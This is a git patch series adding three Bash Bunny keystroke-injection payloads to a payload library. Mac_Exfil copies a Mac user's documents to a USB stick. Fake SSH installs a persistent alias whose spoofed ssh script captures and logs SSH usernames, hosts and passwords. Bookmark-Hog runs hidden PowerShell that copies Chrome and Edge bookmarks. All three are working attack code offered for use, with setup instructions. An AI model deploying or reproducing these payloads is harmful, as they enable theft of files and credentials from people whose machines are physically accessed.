From 2aa4910d0c5a0b0f9ddbf8aaa3e2adbce9ea7f12 Mon Sep 17 00:00:00 2001 From: Carey Balboa <52982329+careyjames@users.noreply.github.com> Date: Tue, 30 Aug 2022 09:28:28 -0500 Subject: [PATCH 1/3] add my own exfil payload (#540) * add my own exfil payload Exfiltrates files from logged in users Documents and Desktop folders * updated * Update readme.md --- .../exfiltration/Mac_Exfil/payload.txt | 45 +++++++++++++++++++ .../library/exfiltration/Mac_Exfil/readme.md | 18 ++++++++ 2 files changed, 63 insertions(+) create mode 100755 payloads/library/exfiltration/Mac_Exfil/payload.txt create mode 100644 payloads/library/exfiltration/Mac_Exfil/readme.md diff --git a/payloads/library/exfiltration/Mac_Exfil/payload.txt b/payloads/library/exfiltration/Mac_Exfil/payload.txt new file mode 100755 index 00000000..d7a252cb --- /dev/null +++ b/payloads/library/exfiltration/Mac_Exfil/payload.txt @@ -0,0 +1,45 @@ +#!/bin/bash + +# Title: Mac_Exfil +# Description: Exfiltrates files from logged in users Documents and Desktop folders +# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600 +# Target: macOS +# Dependencies: none +# +# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot" +LED SETUP +ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267 +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 1000 +LED STAGE1 +QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot" +QUACK ENTER +QUACK DELAY 2000 +# Sync filesystem +# By default, the Linux kernel writes data to disk asynchronously. +# Writes are buffered (cached) in memory, and written to the storage device at the optimal time. +# The sync command forces an immediate write of all cached data to disk. +# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable, +# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT) +sync +QUACK DELAY 2000 +LED STAGE2 +QUACK STRING "diskutil eject BUNNY && killall Terminal" +QUACK ENTER +QUACK DELAY 1000 +LED STAGE3 +# LED payload complete +LED W FAST +mount /dev/mmcblk0p1 /mnt +files=$(find /mnt/loot -type f | wc -l) +# debug=$(find /mnt/loot -type f) +# DEBUG "switch-1-debug" "$files:$debug" +umount /mnt +if [ "$files" != "0" ]; then +LED FINISH +else +LED FAIL +fi diff --git a/payloads/library/exfiltration/Mac_Exfil/readme.md b/payloads/library/exfiltration/Mac_Exfil/readme.md new file mode 100644 index 00000000..fa9f7f7d --- /dev/null +++ b/payloads/library/exfiltration/Mac_Exfil/readme.md @@ -0,0 +1,18 @@ +# Mac_Exfil for the BashBunny + +* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600 +* Version: Version 1.0 +* Target: macOS + +## Description + +A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders + + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Executing Payload | +| Green | Successfully grabbed files | +| Red | Did not get files | From b10a644277e3d981d1ef96ec9a429b3cdf5052f1 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Tue, 30 Aug 2022 10:37:50 -0400 Subject: [PATCH 2/3] Add Fake SSH (#544) 1) Copies the "ssh" command spoofing program to the user's home directory. 2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases". 3) When the user executes the command "ssh" in a terminal, the spoofing program : - __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password". - __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file. --- payloads/library/phishing/fake-ssh/README.md | 44 ++++++++++ .../library/phishing/fake-ssh/payload.txt | 86 +++++++++++++++++++ .../library/phishing/fake-ssh/ssh-phishing.sh | 48 +++++++++++ 3 files changed, 178 insertions(+) create mode 100644 payloads/library/phishing/fake-ssh/README.md create mode 100644 payloads/library/phishing/fake-ssh/payload.txt create mode 100644 payloads/library/phishing/fake-ssh/ssh-phishing.sh diff --git a/payloads/library/phishing/fake-ssh/README.md b/payloads/library/phishing/fake-ssh/README.md new file mode 100644 index 00000000..ca3bb433 --- /dev/null +++ b/payloads/library/phishing/fake-ssh/README.md @@ -0,0 +1,44 @@ +# Fake SSH + +- Title: Fake SSH +- Author: TW-D +- Version: 1.0 +- Target: Linux +- Category: Phishing + +## Description + +1) Copies the "ssh" command spoofing program to the user's home directory. +2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases". +3) When the user executes the command "ssh" in a terminal, the spoofing program : +- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password". +- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file. + +## Configuration + +From "payload.txt" change the values of the following constant : +```bash + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" + +``` + +From "ssh-phishing.sh" change the values of the following constants if necessary : +```bash + +readonly MAXIMUM_ATTEMPTS=3 + +``` + +From "ssh-phishing.sh", change the payload if you wish : +```bash +## +# +## +/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password +## +# +## +``` \ No newline at end of file diff --git a/payloads/library/phishing/fake-ssh/payload.txt b/payloads/library/phishing/fake-ssh/payload.txt new file mode 100644 index 00000000..2b941a78 --- /dev/null +++ b/payloads/library/phishing/fake-ssh/payload.txt @@ -0,0 +1,86 @@ +#!/bin/bash +# +# Title: Fake-SSH +# +# Description: +# This program creates a fake "ssh" +# command by defining an persistent alias. +# +# Author: TW-D +# Version: 1.0 +# Category: Phishing +# Target: Linux +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1 +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Yellow quadruple blink .......................... STAGE4 +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +udisk mount + +######## ATTACK ######## + +LED ATTACK + +Q DELAY 7000 +Q CTRL-ALT t +Q DELAY 7000 + +LED STAGE2 + +Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/" +Q ENTER +Q DELAY 1500 + +Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING " chmod +x ~/.ssh_phishing.sh" +Q ENTER +Q DELAY 1500 + +Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases" +Q ENTER +Q DELAY 1500 + +LED STAGE4 + +Q STRING " exit" +Q ENTER +Q DELAY 1500 + +######## CLEANUP ######## + +LED CLEANUP + +sync +udisk unmount + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 \ No newline at end of file diff --git a/payloads/library/phishing/fake-ssh/ssh-phishing.sh b/payloads/library/phishing/fake-ssh/ssh-phishing.sh new file mode 100644 index 00000000..0d71f168 --- /dev/null +++ b/payloads/library/phishing/fake-ssh/ssh-phishing.sh @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Fake-SSH +# +# This program imitates the behavior +# of the "ssh" command. +# + +readonly MAXIMUM_ATTEMPTS=3 + +attempts() { + /bin/echo -n "${1}'s password: " + read -r -s ssh_password + /bin/echo "" + /bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}" + if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then + ## + # + ## + /bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password + ## + # + ## + /bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null + /bin/rm "${SSH_ASKPASS}" + exit 0 + fi + /bin/echo "Permission denied, please try again." +} + +if [ "${#}" -eq 0 ]; then + /usr/bin/ssh +else + for destination in "${@}"; do + if [[ "${destination}" =~ "@" ]]; then + export SSH_ASKPASS="/tmp/.askpass_script.sh" + /bin/echo "" > "${SSH_ASKPASS}" + chmod +x "${SSH_ASKPASS}" + for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do + attempts "${destination}" "${*}" + done + /bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)." + /bin/rm "${SSH_ASKPASS}" + exit 0 + fi + done + /usr/bin/ssh "${@}" +fi \ No newline at end of file From 8e322706bcb80184ff490bc14b31c77d646cca67 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Tue, 30 Aug 2022 10:56:42 -0400 Subject: [PATCH 3/3] New payload - Bookmark-Hog (#543) --- .../library/exfiltration/Bookmark-Hog/BBB.ps1 | 47 ++++++++ .../exfiltration/Bookmark-Hog/README.md | 104 ++++++++++++++++++ .../exfiltration/Bookmark-Hog/payload.txt | 22 ++++ 3 files changed, 173 insertions(+) create mode 100644 payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 create mode 100644 payloads/library/exfiltration/Bookmark-Hog/README.md create mode 100644 payloads/library/exfiltration/Bookmark-Hog/payload.txt diff --git a/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 new file mode 100644 index 00000000..043e1574 --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 @@ -0,0 +1,47 @@ +#Bookmark-Hog + +# Get Drive Letter +$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name + +# Test if directory exists if not create directory in loot folder to store file +$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt" +$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt" + +if(!(Test-Path -Path $TARGETDIR )){ + mkdir $TARGETDIR +} + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The chrome bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } + } + # Copy Chrome Bookmarks to Bash Bunny + else { + Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR" + } + + +# See if file is a thing +Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The edge bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } +} + # Copy Chrome Bookmarks to Bash Bunny + else { + Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" +} \ No newline at end of file diff --git a/payloads/library/exfiltration/Bookmark-Hog/README.md b/payloads/library/exfiltration/Bookmark-Hog/README.md new file mode 100644 index 00000000..47fe90c7 --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/README.md @@ -0,0 +1,104 @@ + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Bookmark-Hog + +A payload to exfiltrate bookmarks of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the bookmark history +These files will be saved to the bash bunny in the loot directory + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Let the magic happen + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Bookmark-Hog/payload.txt b/payloads/library/exfiltration/Bookmark-Hog/payload.txt new file mode 100644 index 00000000..392ab545 --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt @@ -0,0 +1,22 @@ +# Title: Bookmark-Hog +# Description: This payload is meant to exfiltrate bookmarks to the bash bunny. +# Author: atomiczsec +# Version: 1.0 +# Category: Exfiltration +# Attackmodes: HID, Storage +# Target: Windows 10, 11 + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +QUACK GUI r +QUACK DELAY 100 +LED STAGE2 +QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')" +QUACK ENTER \ No newline at end of file